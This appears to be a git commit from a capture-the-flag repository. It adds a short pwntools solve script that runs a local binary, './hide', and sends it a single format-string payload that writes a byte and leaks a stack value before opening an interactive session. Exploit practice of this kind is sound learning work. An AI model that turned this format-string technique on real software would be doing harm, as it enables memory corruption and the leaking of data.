solve script0

This commit is contained in:
jc
2025-05-11 22:16:45 +03:00
parent 483f58ba63
commit 8fde7c0319
+14
View File
@@ -0,0 +1,14 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./hide", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# buf
s(b"%160c%hhn%6$s")
r.interactive()